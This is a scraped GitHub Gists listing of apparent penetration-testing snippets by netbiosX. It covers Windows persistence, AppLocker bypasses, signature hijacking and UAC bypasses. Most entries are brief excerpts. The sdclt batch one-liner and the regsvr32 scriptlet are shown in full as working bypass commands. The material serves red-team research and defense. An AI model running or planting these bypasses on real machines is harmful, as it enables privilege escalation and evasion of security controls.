Skip to content

Instantly share code, notes, and snippets.


netbiosX netbiosX

Block or report user

Report or block netbiosX

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
netbiosX / ImageFileExecutionOptions.ps1
Last active Jan 14, 2020
Image File Execution Options Injection - Persistence Technique
View ImageFileExecutionOptions.ps1
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
# Image File Execution Options Injection Persistence Technique
function Persist-Debugger
netbiosX / pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
View pentestlab-dll.inf
netbiosX / DigitalSignature-Hijack.ps1
Last active May 23, 2019
Hijack Digital Signatures and Bypass Authenticode Hash Validation
View DigitalSignature-Hijack.ps1
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
netbiosX / customers.xml
Created Jul 5, 2017
Bypass Application Whitelisting via msxsl binary
View customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
netbiosX / Sdclt.ps1
Last active Jul 31, 2019
Bypass UAC via sdclt in Windows 10 systems
View Sdclt.ps1
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
netbiosX / sdclt.bat
Created Jun 9, 2017
UAC Bypass in Windows 10 via sdclt - batch version
View sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
netbiosX / FodhelperUACBypass.ps1
Last active Feb 19, 2020
Bypass UAC via Fodhelper binary in Windows 10 systems
View FodhelperUACBypass.ps1
This script can bypass User Access Control (UAC) via fodhelper.exe
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
netbiosX / pentestlab.sct
Created May 10, 2017
AppLocker - Regsvr32
View pentestlab.sct
<?XML version="1.0"?>
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");
You can’t perform that action at this time.